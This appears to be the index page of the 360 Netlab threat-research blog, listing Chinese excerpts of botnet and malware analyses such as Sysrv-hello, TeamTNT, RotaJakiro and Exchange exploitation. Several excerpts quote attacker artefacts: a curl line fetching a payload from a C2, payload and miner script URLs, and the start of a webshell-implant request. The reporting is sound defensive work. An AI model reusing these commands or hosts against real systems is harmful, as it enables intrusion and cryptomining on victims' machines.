360 Netlab Blog - Network Security Research Lab at 360

Network Security Research Lab at 360

七年一剑,360 DNS威胁分析平台
DTA

七年一剑,360 DNS威胁分析平台

360Netlab (360 网络安全研究院) 自2014年成立以来,大网安全分析相关技术一直是我们的核心研究方向,我们是最早在国内提出从数据维度做安全的团队 ,并将大数据技术、AI技术和威胁情报应用于大网安全研究工作中。过去7年多的安全研究,我们取得了非常多耀眼的成果:我们是 360 情报云最主要的情报供应团队之一,建立了国内首个也是最大的公开PassiveDNS系统,以及多个业内领先的Whois、证书、IP、样本等基础数据系统。我们诸多研究成果被国内外媒体转载报道,并多次在国际顶级安全会议发表演讲。我们在全球范围内率先披露了2位数以上有影响力的僵尸网络,并获得 FBI 的致谢,发现并命名的Satori僵尸网络的作者被美国国土安全局抓获并判刑,还有诸多不方便公开的实例不一而足。        凡是过往,皆为序章。        虽然过去7年我们一直以安全研究的形象出现,但这两年我们开始主动尝试产品化的探索。 我们这么做不是为了KPI,而是渴望将我们在安全研究中积累的技术优势能够实实在在的应用到企业网络中,在更大维度内为客户网络安全直接贡献我们的力量,为客户的企业网络
  • kenshin
    kenshin
12 min read
0-day

Mirai_ptea_Rimasuta变种正在利用RUIJIE路由器在野0DAY漏洞传播

版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 2021年7月我们向社区公布了一个通过KGUARD DVR未公开漏洞传播的僵尸网络Mirai_ptea,一开始我们认为这是一个生命短暂的僵尸网络,不久就会消失不见,因此只给了它一个通用的名字。但很显然我们小看了这个家族背后的团伙,事实上该家族一直非常活跃,最近又观察到该家族正在利用RUIJIE NBR700系列路由器的在野0day漏洞传播。 比较有意思的是,该家族的作者曾经在某次更新的样本中加入了这么一段话吐槽我们的mirai_ptea命名: -_- you guys didnt pick up on the name? really??? its ``RI-MA-SU-TA``. not MIRAI_PTEA this is dumb name. 出于对作者的"尊重",以及对该团伙实力的重新评估,我们决定将其命名为Mirai_
  • Hui Wang
    Hui Wang
  • Alex.Turing
    Alex.Turing
  • YANG XU
    YANG XU
14 min read
Botnet

Mozi已死,余毒犹存

背景 360NETLAB于2019年12月首次披露了Mozi僵尸网络,到现在已有将近2年时间,在这段时间中,我们见证了它从一个小规模僵尸网络发展为巅峰时占据了极高比例IOT流量巨无霸的过程。 现在Mozi的作者已经被执法机关处置,其中我们也全程提供了技术协助,因此我们认为后续在相当长的一段时间内它都不会继续更新。但我们知道,Mozi采用了P2P网络结构,而P2P网络的一大“优点”是健壮性好, 即使部分节点瘫痪,整个网络仍然能工作。所以即使Mozi作者不再发布新的更新,它仍然会存活一段时间,残余的节点仍然会去感染其它存在漏洞的设备,所以我们现在仍然能看到Mozi在传播,正可谓“百足之虫,死而不僵”。 许多安全厂商都对Mozi进行了跟踪分析,但从我们的角度而言,或多或少有些遗漏,甚至有错误。今天我们将对Mozi的看法总结在下面这篇文章里,以补充安全社区的分析;同时也为我们对Mozi僵尸网络的持续关注画上一个句号。 本文将回答以下问题: 1:Mozi除Bot节点外还有别的功能节点吗? 2:Mozi Bot模块有新功能吗? 3:Mozi僵尸网络还在更新吗? M
  • Alex.Turing
    Alex.Turing
  • Hui Wang
    Hui Wang
  • Genshen Ye
    Genshen Ye
14 min read
Import 2022-11-30 11:16

威胁快讯:TeamTNT新变种通过ELF打包bash脚本,正通过Hadoop ResourceManager RCE 传播

TeamTNT是一个比较活跃的挖矿家族,曾被腾讯和PAN等国内外安全厂商多次分析[1][2],我们的BotMon系统也曾多次捕获。以往经验显示,TeamTNT家族喜欢使用新技术,比如名为EzuriCrypter的加密壳就是首次在TeamTNT样本中被检测到。近期,我们的Anglerfish蜜罐再次捕获到TeamTNT的新变种,使用了如下新技术和工具: 1. 通过ELF文件包装入口bash脚本。 2. 集成了一个新的Go编写的扫描器。 从功能角度看,新变种和5月份曝光的版本 相比并没有大的变化,只是在个别功能上做了一些有意思的调整。 Exploit 本轮传播使用了已知漏洞 Hadoop_ResourceManager_apps_RCE。 入口脚本分析 跟以往攻击相同,漏洞利用成功后会植入一个名为i.sh的入口脚本,内容如下: 能看出这段脚本会从RT_URL变量中解码出主模块的URL hxxp://oracle.htxreceive.top/s3f715/i.jpg,然后下载并执行。 ELF打包的主模块分析 主模块为一个ELF文件,代码看上去非
  • jinye
    jinye
4 min read
被拦截的伊朗域名的快速分析
PassiveDNS

被拦截的伊朗域名的快速分析

伊朗新闻网站被美国阻断的事成为了最近的新闻热点,报道的主要内容是: 美国司法部查封36个伊朗的新闻网站,其中许多网站与伊朗的“虚假信息活动”有关。这些网站首页通知显示,根据美国法律,这些网站已被美国政府查封,通知上还附有美国联邦调查局和美国商务部产业安全局的印徽。 到底哪些新闻站被拦截了,我们查询了几个新闻源都没有给出全部被拦截的网站列表。 其实这种从域名角度做拦截的手段,总是会在大网的DNS/whois数据中留下踪迹。我们利用这些网络基础数据分析出了32+2个被拦截的伊朗新闻网站的域名,其中的2个域名是在今年3月和4月份被拦截的;通过技术分析,也确认这些修改是直接通过注册局进行的改动。被拦截的域名的详细列表见文末。 分析 我们拿其中被拦截的域名之一alalamtv.net 来做一个分析(见相关新闻报道)。 DNS记录 从该域名出发,我们利用PassivedDNS记录可以看到,其NS服务器和IP地址在6月23号的凌晨3点40开始发生了变化,无论NS服务器还是IP地址都切换到了亚马逊的服务器。 whois记录 先说结论:通过对不同域名的w
  • Zhang Zaifeng
    Zhang Zaifeng
10 min read
Backdoor

窃密者Facefish分析报告

背景介绍 2021年2月,我们捕获了一个通过CWP的Nday漏洞传播的未知ELF样本,简单分析后发现这是一个新botnet家族的样本。它针对Linux x64系统,配置灵活,并且使用了一个基于Diffie–Hellman和Blowfish的私有加密协议。但因为通过合作机构(在中国区有较好网络通信观察视野)验证后发现对应的C2通信命中为0,所以未再深入分析。 2021年4月26号,Juniper发布了关于此样本的分析报告,我们注意到报告中忽略了一些重要的技术细节,所以决定将漏掉的细节分享出来。 该家族的入口ELF样本MD5=38fb322cc6d09a6ab85784ede56bc5a7是一个Dropper,它会释放出一个Rootkit。因为Juniper并未为样本定义家族名,鉴于Dropper在不同的时间点释放的Rootkit有不同的MD5值,犹如川剧中的变脸,并且该家族使用了Blowfish加密算法,我们将它命名为Facefish。 Facefish概览 Facefish由Dropper和Rootkit 2部分组成,主要功能由Rootkit模块决定。Rootki
  • Alex.Turing
    Alex.Turing
  • jinye
    jinye
  • Chai Linyuan
    Chai Linyuan
17 min read
Botnet

“双头龙”源自海莲花组织?

我们的双头龙blog发布后引起了较大反响,除了媒体转载,一些安全同行还纷纷在我们blog下面留言和提问,其中5月4号的一则留言提到双头龙跟海莲花(OceanLotus)样本的C2行为有联系: 留言所提到的样本为一个zip打包文件,2016年就已出现。该zip可以解压出多个文件,那个名为Noi dung chi tiet(对应中文详细信息)的Mach-O格式可执行文件即是海莲花样本。对比分析显示该样本确实与双头龙样本存在多个相似之处,所以它们或许可以解开双头龙的身世之谜:它极可能是海莲花的Linux版本。本文主要从2进制代码层面介绍这些相似点。 相似点1:C2会话建立函数 Linux常见的域名解析函数为gethostbyname(),但双头龙使用了相对小众的getaddrinfo()函数,C2域名的解析和会话建立都在一个函数中完成,而海莲花样本中也存在一个模式类似的相同功能的函数,2者的函数对比如下: 能看出来它们不但功能相同,对sprintf()和getaddrinfo()的使用方式也几乎一模一样。此外,双头龙和海莲花都使用了单独的数据结构来保存C2会话信息,比如
  • Alex.Turing
    Alex.Turing
6 min read
sysrv

威胁快讯:Sysrv-hello再次升级,通过感染网页文件提高传播能力

版权 版权声明: 本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 从去年末到现在,挖矿类型的botnet家族一直活跃,除了新家族不断出现,一些老家族也频繁升级,主要是为了提高传播能力和隐蔽性,我们的 BotMon 系统对此多有检测[rinfo][z0miner]。最新的案例来自Sysrv-hello,本来近期已经有2家安全公司先后分析过该家族的新变种[1][2],但文章刚出来sysrv的作者就在4月20号再次进行升级,增加了感染网页的能力,本文对此做一分析。 新模块a.py和BrowserUpdate.exe 我们知道sysrv能同时感染Linux和Windows系统,其入口为一个脚本文件,Linux下为bash脚本,最常见的文件名是ldr.sh,Windows下为PowerShell脚本ldr.ps1,这次升级只在ldr.sh中检测到,bash脚本中添加了如下代码: curl $cc/BrowserUpdate.exe > /tmp/BrowserUpdate.exe curl
  • LIU Ya
    LIU Ya
  • YANG XU
    YANG XU
  • jinye
    jinye
4 min read
Botnet

双头龙(RotaJakiro),一个至少潜伏了3年的后门木马

版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 2021年3月25日,360 NETLAB的BotMon系统发现一个的VT 0检测的可疑ELF文件(MD5=64f6cfe44ba08b0babdd3904233c4857),它会与4个业务类型截然不同的域名进行通信,端口均为TCP 443(HTTPS),但流量却并非TLS/SSL类型,这个异常行为引起了我们的兴趣,进一步分析发现它是一个针对Linux X64系统的后门木马,该家族至少已经存在3年但目前还是0检测。基于该家族使用rotate加密,并且运行后对root/non-root账户有不同的行为,犹如一只双头龙,一体双向,我们将它命名为RotaJakiro。 RotaJakiro隐蔽性较强,对加密算法使用比较多,包括:使用AES算法加密样本内的资源信息;C2通信综合使用了AES,XOR,ROTATE加密和ZLIB压缩算法。指令方面,RotaJakiro支持12种指令码,其中3种是和特定plugin相关的,遗憾的是目前我们并没有捕获到这类pay
  • Alex.Turing
    Alex.Turing
  • Hui Wang
    Hui Wang
16 min read
CVE-2021-26855

Microsoft Exchange 漏洞(CVE-2021-26855)在野扫描分析报告

背景介绍 2021年3月2号,微软披露了Microsoft Exchange服务器的远程代码执行漏洞[1]。 2021年3月3号开始,360网络安全研究院Anglerfish蜜罐开始模拟和部署Microsoft Exchange蜜罐插件,很快我们搜集到大量的漏洞检测数据,目前我们已经检测到攻击者植入Webshell,获取邮箱信息,甚至进行XMRig恶意挖矿(http://178.62.226.184/run.ps1)的网络攻击行为。根据挖矿文件路径名特征,我们将该Miner命名为Tripleone。 2021年3月6号开始,ProjectDiscovery和微软CSS-Exchange项目相继披露了漏洞检测脚本[2][3]。 Microsoft Exchange服务器的远程代码执行漏洞利用步骤复杂,一般从PoC公布到黑色产业攻击者利用需要一定的时间,我们看到这个攻击现象已经开始了。 CVE-2021-26855 植入Webshell POST /ecp/j2r3.js HTTP/1.1 Host: {target} Connection: keep-alive
  • Genshen Ye
    Genshen Ye
  • houliuyang
    houliuyang
13 min read
Import 2022-11-30 11:16

Necro再次升级,使用Tor+动态域名DGA 双杀Windows&Linux

版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 自从我们1月份公开Necro后不久,它就停止了传播,但从3月2号开始,BotMon系统检测到Necro再次开始传播。蜜罐数据显示本次传播所用的漏洞除了之前的TerraMaster RCE(CVE_2020_35665)和Zend RCE (CVE-2021-3007),又加入了两个较新的漏洞Laravel RCE (CVE-2021-3129)和WebLogic RCE (CVE-2020-14882),蜜罐相关捕获记录如下图所示。 通过样本分析我们发现在沉寂一个月之后新版本的Necro有了较大改动,功能进一步加强,体现在: 1. 开始攻击Windws系统,并在Windows平台上使用Rootkit隐藏自身。 2. 更新了DGA机制,采用“子域名DGA+动态域名”的方法生成C2域名。 3. C2通信支持Tor,同时加入了一种新的基于Tor的DDoS攻击方法。 4. 能针对特定Linux目标传播Gafgyt_tor。 5. 能篡改受害
  • jinye
    jinye
  • YANG XU
    YANG XU
15 min read
New Threat

新威胁:ZHtrap僵尸网络分析报告

版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 从2021年2月28日起,360网络安全研究院的BotMon系统检测到IP(107.189.30.190)在持续传播一批未知ELF样本。经分析,我们确认这些样本隶属于一个新的botnet家族,结合其运行特点,我们将其命名为ZHtrap,本文对其做一分析,文章要点如下: 1. ZHtrap的传播使用了4个Nday漏洞,主要功能依然是DDoS和扫描,同时集成了一些后门功能。 2. Zhtrap能将被感染设备蜜罐化,目的是提高扫描效率。 3. Zhtrap感染受害主机后会禁止运行新的命令,以此实现彻底控制和独占该设备。 4. 在C2通信上,ZHtrap借鉴了套娃,采用了Tor和云端配置。 ZHtrap全情介绍 ZHtrap的代码由Mirai修改而来,支持x86, ARM, MIPS等主流CPU架构。但相对Mirai,ZHtrap变化较大,体现在如下方面: * 在指令方面,加入了校验机制 * 在扫描传播方面,增加了对真实设备和蜜
  • Alex.Turing
    Alex.Turing
  • liuyang
  • YANG XU
    YANG XU
15 min read
Botnet

威胁快讯:z0Miner 正在利用 ElasticSearch 和 Jenkins 漏洞大肆传播

版权 版权声明: 本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 最近几个月受比特币、门罗币大涨的刺激,各种挖矿家族纷纷活跃起来,我们的 BotMon 系统每天都能检测到几十上百起的挖矿类 Botnet 攻击事件。根据我们统计,它们多数是已经出现过的老家族,有的只是换了新的钱包或者传播方式,z0Miner 就是其中一例。 z0Miner 是去年开始活跃的一个恶意挖矿家族,业界已有公开的分析。z0Miner 最初活跃时,利用 Weblogic 未授权命令执行漏洞进行传播。 近期,360 网络安全研究院 Anglerfish 蜜罐系统监测到 z0Miner 又利用 ElasticSearch 和 Jenkins 的远程命令执行漏洞进行大肆传播,近期活跃趋势如下: 漏洞利用情况 ElasticSearch RCE 漏洞 CVE-2015-1427 虽然是个
  • JiaYu
4 min read